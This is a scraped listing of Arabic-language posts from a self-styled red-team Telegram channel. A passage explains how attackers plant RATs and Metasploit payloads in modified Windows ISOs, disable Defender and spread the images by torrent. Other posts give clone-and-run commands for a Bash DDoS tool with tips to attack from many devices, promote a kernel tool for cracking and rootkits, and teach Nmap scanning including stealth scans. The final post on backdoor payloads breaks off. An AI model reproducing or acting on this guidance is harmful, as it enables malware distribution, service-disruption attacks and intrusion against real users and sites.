كده بيبدأ البلاك هات باستخدام أدوات تعديل متقدمة زي NTLite أو WinReducer اللي بتسمح ليه بتخصيص النسخة سواء عن طريق حذف خدمات معينة أو إضافة برمجيات وأدوات اختراق مباشرة جوة ملفات النسخة الأدوات دي بتتيح ليه تعديل الإعدادات الافتراضية للنظام زي تعطيل Windows Defender والجدار الناري (Firewall) لضمان عدم كشف البرمجيات الخبيثة المدمجة \n\nمن الخطوات المهمة في التعديل هي التلاعب بملفات الـRegistry لأن دي اللي بتتحكم في كل إعدادات النظام تقريبًا البلاك هات ممكن يعدل مفاتيح الـRegistry بحيث يضمن صلاحيات مدير للنظام بشكل تلقائي لكل المستخدمين أو يفتح بروتوكولات معينة زي RDP (Remote Desktop Protocol) للتحكم عن بُعد وأيضًا ممكن يضيف سكربتات Powershell أو ملفات تنفيذية خبيثة تتفعل تلقائيًا بمجرد تشغيل النظام بعد التثبيت باستخدام أدوات زي Metasploit Framework أو Cobalt Strike وعلشان البرمجيات دي تفضل مخفية وغير قابلة للاكتشاف بيتم استخدام أدوات تشفير وتغيير أسماء الملفات وأحيانًا توقيعها رقميًا باستخدام أدوات زي SignTool اللي بتسمح بتوقيع ملفات النظام عشان تبدو أصلية ومش معدلة \n\nكمان من الحاجات اللي بيعتمد عليها البلاك هات هي تعديل ملف الإجابة التلقائية (Autounattend.xml) والملف ده بيسمح بتثبيت النظام تلقائيًا بدون تدخل المستخدم وده بيتيح ليه تخصيص الإعدادات بشكل كامل زي إنشاء حسابات بصلاحيات Admin أو تحديد إعدادات الشبكة بشكل يخدم أهدافه البلاك هات ممكن يضيف برمجيات خبيثة زي RATs (Remote Access Trojans) زي njRAT وDarkComet واللي بتشتغل في الخلفية بدون ما المستخدم يحس بوجودها بالإضافة إلى ذلك بعض البلاك هات بيستغلوا ثغرات معروفة في إصدارات الويندوز القديمة زي WannaCry اللي استغل ثغرة في بروتوكول SMB وبيسيبوا الثغرات دي مفتوحة وجاهزة للاستغلال بمجرد تشغيل النظام \n\nبعد الانتهاء من التعديلات بيتم ضغط الملفات مرة تانية في صورة ISO باستخدام أدوات ضغط مخصصة وبيتم اختبار النسخة المعدلة على بيئة افتراضية زي VirtualBox أو VMware للتأكد من إن كل التعديلات شغالة بشكل سليم لو النسخة فيها مشاكل بيتعدل عليها مرة تانية لحد ما تكون جاهزة بعد كده بيتم نشر النسخة من خلال مواقع التورنت أو منصات مشاركة الملفات وأحيانًا البلاك هات بيستغل استراتيجيات الهندسة الاجتماعية عن طريق الترويج للنسخة على إنها نسخة معدلة ومميزة زي إضافة خلفيات جديدة أو برامج مدفوعة مجانية لجذب أكبر عدد من الناس لتثبيتها بمجرد ما الضحايا يثبتوا النسخة المعدلة البلاك هات بيبدأ يتحكم في الأنظمة المصابة ويستغلها في هجمات أكبر زي هجمات DDoS أو حتى تعدين العملات الرقمية","datePublished":"2025-05-24T11:05:19Z","dateModified":"2025-05-24T11:05:19Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":19}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1525","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1525","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1525","headline":"اذا هجمت DDOS واتحظرت ↔️ وانت ما تعرف او شئ وتريد تعرف الموقع شغال ام لا تفضل الاداه الجديده اوامر التنزيل وا…","articleBody":"اذا هجمت DDOS واتحظرت ↔️\n\nوانت ما تعرف او شئ وتريد تعرف الموقع شغال ام لا تفضل الاداه الجديده \n\nاوامر التنزيل والتشغيل ⬇️⬇️\n\ngit clone https://github.com/MohamedAbuAl-Saud/Scan-DF/\n\n\ncd Scan-DF\n\n\nchmod +x scan-DF.sh\n\n\nbash scan-DF.sh","datePublished":"2025-05-24T11:05:19Z","dateModified":"2025-05-24T11:05:19Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":18}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1523","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1523","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1523","headline":"DDOSATTACK↔️ حجب خدمه المواقع ↔️ اداه نزلت ع github امس تم تطورها بللغه Bash الاداه متوسطه في الهجوم *️⃣ ادخل…","articleBody":"DDOSATTACK↔️\n\n\nحجب خدمه المواقع ↔️\n\nاداه نزلت ع github امس تم تطورها بللغه Bash \n\nالاداه متوسطه في الهجوم *️⃣\n\nادخل ضع الرابط انتضر الهحوم 20 دقيقه ع الاقل وشوف واهجم من اجهزه مختلفه ان قدرت + افتح كذا تيرمنل واهجم \n\nاوعدك انها هتتطور 😊\n\nتدعم (Termux& kali linux& Windows& Linux ) \n\n🟦🟦🟦🟦🟦\n\nاوامر تنزيل وتشغيل ⬇️\n git clone https://github.com/MohamedAbuAl-Saud/DDOSATTACK_DF.git\n\n cd DDOSATTACK_DF\n\n\nchmod +x DDOSATTACK.sh\n\n\n bash DDOSATTACK.sh\n🟦🟦🟦🟦🟦\nBy||@A_Y_TR⭐️\n🟦🟦🟦🟦🟦\n🟦🟦\n DF🥷\n🟦🟦\nوبس والله😊","datePublished":"2025-05-24T11:05:18Z","dateModified":"2025-05-24T11:05:18Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":20}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1522","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1522","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1522","headline":"برنامج CM64 Pro واحد من أقوى الأدوات اللي أي هاكر ممكن يستخدمها، وده لأنه بيقدم مميزات رهيبة تخليك تتحكم في ك…","articleBody":"برنامج CM64 Pro واحد من أقوى الأدوات اللي أي هاكر ممكن يستخدمها، وده لأنه بيقدم مميزات رهيبة تخليك تتحكم في كل حاجة في الجهاز من غير ما تحس إن فيه حاجة مقيدة شغلك. البرنامج واجهته بسيطة وسهلة، أي حد ممكن يتعامل معاها، بس المميز فيه إنه مليان حاجات احترافية تخلّي أي بلاك هات يقدر يستغلّه لأقصى درجة. أول حاجة مميزة فيه هي إنه بيخلّيك تعدّل على الكيرنل نفسه، يعني قلب نظام التشغيل، وتقدر تحفظ وتحمّل اللي عدلته بسهولة. الفكرة دي لوحدها بتفتح أبواب لا نهائية لأي حد عاوز يختبر أو يستغل النظام بطريقة مش تقليدية.\n\nكمان البرنامج فيه Hex-based Expression Parser، وده بيخلّيك تقدر تبحث في الذاكرة وتستخرج أي بيانات أو عناوين بسهولة، سواء كنت بتدور على حاجة معينة أو بتحلل حاجة شغّالة. غير كده، البرنامج بيديك خريطة للذاكرة وبيوريك كل الوحدات النمطية والخيوط اللي شغالة، وده بيفيد جدًا في فهم كل التفاصيل اللي بتحصل في النظام. ميزة تعديل الرجسترات كمان رهيبة، لأنك بتقدر تتحكم في العمليات اللي شغالة بشكل مباشر.\n\nالبرنامج بيتميز بإنه بيخلّيك تشتغل على الـ I/O ports، يعني تقرأ وتكتب بيانات على مستوى الأجهزة الفيزيائية، زي الذاكرة أو الكروت اللي متوصلة بالجهاز، وده بيديك قدرة تلاعب مش طبيعية. كمان فيه أداة Fast Assembler/Disassembler باستخدام Zydis 4.0.0، واللي بتخليك تفك كود أي برنامج أو عملية شغالة وتعدل عليه وترجّعه شغال تاني، ودي ميزة هتساعدك جدًا في الكراك وفك حماية البرامج والألعاب المدفوعة.\n\nالبرنامج كمان بيدعم الإضافات، يعني ممكن تعمل Plugins تخلي البرنامج يخدم احتياجاتك بشكل أكبر، وده بيضيف ليه مرونة رهيبة. غير كده، فيه حاجة اسمها نظام استعراض الهياكل، زي العمليات اللي شغالة، تعريفات النظام، البيوس، الـ ACPI، وحتى العمليات اللي بتحصل في الكيرنل، وده بيدي صورة كاملة لأي هاكر عاوز يفهم النظام كويس أو يكتشف ثغرات.\n\nأكتر حاجة هايلة فيه هي إنك تقدر تصحح الكيرنل أو العمليات اللي شغالة من غير ما تحتاج تشغل الـ Debug Mode بتاع ويندوز أو تفعل الـ Global Debug Flag، ودي ميزة خطيرة جدًا لأي بلاك هات عشان يشتغل من غير ما يتكشف بسهولة. لو عاوز تطور البرنامج، ممكن تفكر تدمجه مع أدوات تحليل قواعد بيانات عشان تقدر تحلل بيانات مسروقة، أو تطور إضافات تخليك تتفاعل مع أنظمة السحابة أو الأجهزة المتوصلة بالجهاز زي كروت الشاشة والهاردات.\n\nالبرنامج كمان بيخلّيك تعدّل على الملفات الثنائية مباشرة، يعني لو عاوز تعمل باتش أو تعديلات على برنامج معين وتوزعها، ده سهل جدًا. ولو بتفك تشفير حاجة، تقدر تستغل الذاكرة عشان تستخرج مفاتيح التشفير أو تحلل أنظمة الحماية في البرامج وتفكّها. ممكن كمان تدمجه مع Rootkits عشان تضمن إن شغلك كله مخفي وماحدش يكتشفه.\n\nباختصار، CM64 Pro أداة جبارة لأي هاكر محترف. بتديك سيطرة كاملة على النظام وتفتح أبواب جديدة لأي حد شغال في البلاك هات. لو طورتها بدماغ شغالة، هتلاقي نفسك ماسك سلاح يديك قوة رهيبة في الاختراق وتحليل أي نظام.\n\nرابط الأداة الاسطورية","datePublished":"2025-05-24T11:05:13Z","dateModified":"2025-05-24T11:05:13Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":23}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1521","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1521","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1521","headline":"🟦🟦🟦🟦🟦🟦🟦 الاداه الجديده نزلت ع github ↔️ فايده الاداه: 1- فحص الموقع من الثغرات المشهوره مثل sql و xss وغيرهم…","articleBody":"🟦🟦🟦🟦🟦🟦🟦\nالاداه الجديده نزلت ع github ↔️\n\nفايده الاداه: \n1- فحص الموقع من الثغرات المشهوره مثل sql و xss وغيرهم\n\n2- فحص DDOS التاثير ع الموقع ناجح ام فاشل \n\n3- فحص ملفات للموقع مصرح بها او غير يجب اغلقها لعدم \nاستغللها من قبل الهاك \n\n4- فحص بورتات مفتوحه ولو لها اصدار يطلع اصدرها ولو لها استغلال exploit يطلع مربوطه ب nmap معا بعض التطوير \n\n5- فحص زمن الاستجابه Dos + عدد روابط داخله وخارجيه \n\n🟦🟦🟦🟦🟦🟦🟦 \n\nتنزيل الاداه تدعم (Termux& kali linux& Windows& Linux ) \n\n\n\n\n(Bash) \n\n \n\n\ngit clone https://github.com/MohamedAbuAl-Saud/SCANNER-DF\n\n\ncd SCANNER-DF\n\n\nchmod +x SCANNER-DF.sh\n\n\nbash SCANNER-DF.sh\n🟦🟦🟦🟦🟦\nBy||@A_Y_TR⭐️\n🟦🟦🟦🟦🟦\n🟦🟦\n DF🥷\n🟦🟦\nوبس والله😊","datePublished":"2025-05-24T11:05:13Z","dateModified":"2025-05-24T11:05:13Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":26}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1520","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1520","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1520","headline":"Nmap - 4","articleBody":"Nmap - 4","datePublished":"2025-05-24T11:05:12Z","dateModified":"2025-05-24T11:05:12Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":21}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1519","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1519","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1519","headline":"Nmap - 3","articleBody":"Nmap - 3","datePublished":"2025-05-24T11:05:12Z","dateModified":"2025-05-24T11:05:12Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":22}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1518","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1518","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1518","headline":"Nmap - 2","articleBody":"Nmap - 2","datePublished":"2025-05-24T11:05:12Z","dateModified":"2025-05-24T11:05:12Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":21}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1517","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1517","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1517","headline":"Nmap - 1","articleBody":"Nmap - 1","datePublished":"2025-05-24T11:05:11Z","dateModified":"2025-05-24T11:05:11Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":17}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1516","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1516","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1516","headline":"مثال: nmap --top-ports 20 192.168.1.1 ده هيعرض المنافذ الشائعة فقط على الجهاز 192.168.1.1. 8. فحص كل المنافذ:…","articleBody":"مثال:\nnmap --top-ports 20 192.168.1.1\nده هيعرض المنافذ الشائعة فقط على الجهاز 192.168.1.1.\n\n\n\n\n8. فحص كل المنافذ:\n\nلو حابب تفحص كل المنافذ من 1 لـ 65535 على جهاز ما، استخدم:\n\n\nnmap -p- \nشرح:\n\nده هيقوم بفحص كل المنافذ من 1 لـ 65535.\n\nبيكون أبطأ من الفحص على المنافذ المحددة لكن بيديك فحص شامل لكل المنافذ.\n\n\nمثال:\nnmap -p- 192.168.1.1\nده هيقوم بفحص كل المنافذ على الجهاز.\n\n\n9. حفظ النتائج في ملف:\n\nلو حابب تحفظ نتائج الفحص في ملف علشان تراجعها بعدين، استخدم:\n\n\nnmap -oN DF.txt \nشرح:\n\nده هيسمح لك بحفظ النتائج في ملف نصي.\n\nده مفيد لو حابب تشارك النتائج أو تراجعها لاحقًا.\n\n\nمثال:\n\n\nnmap -oN DF.txt 192.168.1.1\nده هيحفظ كل نتائج الفحص في ملف نصي اسمه DF.txt\n\n\n\n10. فحص الثغرات باستخدام السكربتات (Script Scanning):\n\nNmap بتيجي مع سكربتات جاهزة بتساعدك تكشف عن ثغرات معروفة في الخدمات زي HTTP أو FTP أو غيرهم.\n\n\n\nnmap --script \nشرح:\n\nهنا تقدر تستخدم سكربتات معينة تبحث عن ثغرات معروفة، زي سكربتات Nmap Scripting Engine (NSE).\n\nNmap فيها مجموعة كبيرة من السكربتات الجاهزة لكل أنواع الخدمات، واللي بتساعدك تكتشف الثغرات بسرعة.\n\n\nمثال:\nnmap --script=http-vuln-cve2015-1635 192.168.1.1\nده هيستخدم سكربت معين للكشف عن ثغرة معروفة في خدمة HTTP.\n\n\n\n11. اكتشاف الأجهزة المتصلة بالشبكة (Ping Sweep):\n\nلو حابب تكتشف الأجهزة المتصلة في الشبكة من غير فحص المنافذ، استخدم:\n\n\nnmap -sn \nشرح:\n\nده بيعمل Ping لكل الأجهزة في النطاق المحدد من غير ما يفحص المنافذ.\n\nده مفيد لو حابب تكتشف الأجهزة المتصلة في الشبكة.\n\n\nمثال:\n\nnmap -sn 192.168.1.0/24\nده هيعمل Ping لكل الأجهزة المتصلة على الشبكة من 192.168.1.1 لـ 192.168.1.255.\n\n\nالملخص: \n\nكل الأوامر دي هتساعدك تكتشف وتفحص الأجهزة والشبكات اللي حواليك \nتقدر تبدأ بأوامر بسيطة زي\nnmap \nوبعد كده تتعمق في الأوامر الأكثر تعقيدًا زي الفحص الخفي، أو استخدام السكربتات لاكتشاف الثغرات. استخدام Nmap هيكون مفيد جدًا في اختبار أمان الشبكات. \n\nهتنزل كزرسات nmap دلوقتي \nواتمنا تكونو أستفدتو ♥\n\nوبس والله 😊","datePublished":"2025-05-24T11:05:11Z","dateModified":"2025-05-24T11:05:11Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":21}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1515","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1515","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1515","headline":"شرح لي Nmap اي يا عم زعيم عمل تقولي ن ماب ن ماب في ايه وضحلي كدا ايه الأداه دي؟ حاضر يا سيدي أسمع: أداة Nmap…","articleBody":"شرح لي Nmap\n\nاي يا عم زعيم عمل تقولي ن ماب ن ماب في ايه وضحلي كدا ايه الأداه دي؟ \n\nحاضر يا سيدي أسمع: \nأداة Nmap (Network Mapper) هي واحدة من أقوى الأدوات المستخدمة في مجال اختبار الأمن السيبراني \nاكتشاف الشبكات وفحص الثغرات.\n نقدر من خلالها نكتشف الأجهزة المتصلة بالشبكة نعرف الخدمات اللي شغالة على المنافذ وكمان نكتشف نظام التشغيل اللي بيشغل الجهاز المستهدف.\n هشرح أوامر Nmap بلتفاصيل تابع \n\nأداة Nmap:\n\nNmap هي أداة مفتوحة المصدر تستخدم لاكتشاف الأجهزة المتصلة بشبكة معينه\nفحص المنافذ المفتوحة على الأجهزة والتحقق من الخدمات اللي شغالة عليها.\n بتستخدم في اختبار أمان الشبكات وأجهزة السيرفرات\n وعشان تكتشف الثغرات الموجودة في الأنظمة.\n\nجميل طيب ازاي استخدمها وانزلها يا عم زعيم انزله ع kali kinux ولا انظمه للينكس ولا ايه؟\n\nحاضر يا سيدي هقولك ازاي تنزلها وتستخدمها واومرها كمان تابع معيا \n\n1. تثبيت Nmap على Termux:\n\nلو أنت بتستخدم Termux على موبايل أندرويد وعاوز تشغلها تابع \n\nأولًا قم بتحديث الحزم\n\npkg update && pkg upgrade\nثم قم بتثبيت Nmap:\n\npkg install nmap\nلتتأكد من التثبيت، اكتب:\n\nnmap --version\nعلى Kali Linux:\n\nلو أنت على Kali Linux، افتح الـ Terminal واكتب:\n\nلتحديث الحزم:\n\nsudo apt update && sudo apt upgrade\nلتثبيت Nmap (لو مش مثبت):\n\n\nsudo apt install nmap\nلتتأكد من التثبيت:\nnmap --version\n\nجميل ثبتناها ازاي نستخدمها يا زعيم؟ \n\nحاضر تابع \n\nاوامر Nmap الاكثر شائعه مشهوره ومستخدمه كثير \n\n\n1. فحص جهاز معين (IP):\n\nلو حابب تفحص جهاز معين لمعرفة المنافذ المفتوحة عليه أو حالته بشكل عام\n\nnmap \nشرح:\n\nبتحط مكان عنوان الـ IP للجهاز أو السيرفر اللي حابب تفحصه.\n\nالأمر ده بيعرض لك المنافذ المفتوحة على الجهاز وفي بعض الأحيان بيدي تفاصيل عن النظام والخدمات اللي شغالة على المنافذ.\n\n\nمثال:\n\nnmap 192.168.1.1\nده هيعرض المنافذ المفتوحة على الجهاز اللي عنوانه 192.168.1.1\n\n\n2. فحص مجموعة من الأجهزة:\n\nلو عاوز تفحص أكتر من جهاز في نفس الوقت استخدم النطاق ده\nnmap 192.168.1.1-10\nشرح:\n\nالفحص هيتم للأجهزة من 192.168.1.1 لحد 192.168.1.10.\n\nده مفيد لو عاوز تفحص مجموعة من الأجهزة بنفس الوقت.\n\n\nمثال:\nnmap 192.168.1.1-10\nده هيعرض لك المنافذ المفتوحة على الأجهزة من .1 لـ .10.\n\n\n3. فحص شبكة كاملة (Subnet):\n\nلو عاوز تفحص كل الأجهزة المتصلة في شبكة معينة، استخدم:\n\n\nnmap 192.168.1.0/24\nشرح:\n\nهنا بتحدد الـ Subnet الخاصة بالشبكة.\n\nبتقوم بفحص كل الأجهزة في نفس الشبكة الفرعية 192.168.1.0، وده هيراعي كل الأجهزة من 192.168.1.1 لحد 192.168.1.255.\n\n\nمثال:\nnmap 192.168.1.0/24\nده هيعرض لك كل الأجهزة المتصلة على الشبكة دي.\n\n4. عرض تفاصيل الخدمة والإصدار (Service Version Detection):\n\nلو عاوز تعرف تفاصيل أكثر عن الخدمات والإصدارات التي تعمل على المنافذ المفتوحة استخدم:\n\n\nnmap -sV \nشرح:\n\nالأمر ده بيديك معلومات عن نوع الخدمة اللي شغالة على كل منفذ، وكمان الإصدار الخاص بالخدمة دي.\n\nده بيساعد في تحديد إذا كان فيه أي ثغرات معروفة في الإصدارات دي.\n\n\nمثال:\nnmap -sV 192.168.1.1\n\nده هيعرض لك إصدارات الخدمات اللي شغالة على المنافذ المفتوحة على الجهاز 192.168.1.1.\n\n\n\n\n5. اكتشاف نظام التشغيل (OS Detection):\n\nلو حابب تكتشف نظام التشغيل اللي شغال على الجهاز المستهدف، استخدم:\n\n\nnmap -O \nشرح:\n\nالأمر ده بيحاول يكتشف نوع النظام على الجهاز.\n\nلو الجهاز متاح ومفيش حماية قوية \nNmap هيحاول يخمن نوع النظام باستخدام تقنيات خاصة.\n\n\nمثال:\nnmap -O 192.168.1.1\nده هيكتشف نوع النظام اللي شغال على الجهاز اللي عنوانه 192.168.1.1، سواء كان Windows، Linux أو macOS.\n\n\n\n6. الفحص الخفي (SYN Scan):\n\nلو عاوز تعمل فحص خفي علشان المنافذ المفتوحة من غير ما يتكشف جهازك استخدم:\n\n\n\nnmap -sS \nشرح:\n\nده بيستخدم SYN Scan وده فحص خفي بيسمح لك بتحديد المنافذ المفتوحة من غير ما الجهاز المستهدف يعرف.\n\nالـ SYN Scan بيتم عن طريق إرسال طلب SYN فقط لو تم الرد بـ SYN/ACK ده معناه إن المنفذ مفتوح.\n\n\nمثال:\n\nnmap -sS 192.168.1.1\nده هيعمل فحص SYN على المنافذ المفتوحة في الجهاز 192.168.1.1 دون أن يتم الكشف عن جهازك.\n\n\n\n7. فحص المنافذ الشائعة فقط:\n\nلو مش عاوز تضيع وقتك في فحص كل المنافذ وعاوز تركز على أهم المنافذ، استخدم:\n\n\nnmap --top-ports 20 \nشرح:\n\nالأمر ده بيفحص أكتر المنافذ الشائعة (أو الأكثر استخدامًا) فقط.\n\nلو حابب تفحص أكتر من 20 بورت ممكن تغير الرقم 20 لأي عدد تاني.","datePublished":"2025-05-24T11:05:10Z","dateModified":"2025-05-24T11:05:10Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":20}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1514","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1514","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1514","headline":"ماهو البايلود : باختصار هو السيرفر الذي يتصل بينك وبين الظحية لتوصيل معلومات الضحية اليك عنطريق البورتات والا…","articleBody":"ماهو البايلود : باختصار هو السيرفر الذي يتصل بينك وبين الظحية لتوصيل معلومات الضحية اليك عنطريق البورتات والاتصال العكسي وايضا له عدة اسماء منها تروجان سيرفر ، باكدور ، بايلود ، فايروس كلها شيء واحد \n\n يقسم البايلود الى اقسام رئيسية \n 1- بايلودات انظمة : هذا القسم يقسم الى قسمين رئيسيين \n 1- بايلود للهواتف : هذا البايلود هو على شكل تطبيق للهواتف apk في حال اي شخص يقوم بتثبيته ويفتحه يتم اختراقه بشكل كامل والتوصل لكل حساباته وصوره وملفات وطبعا بقية البايلودات ايضا توصل لكل شيء لكن هذا البايلود مزعج حيث لايمكنك ان تقنع الهكر بان 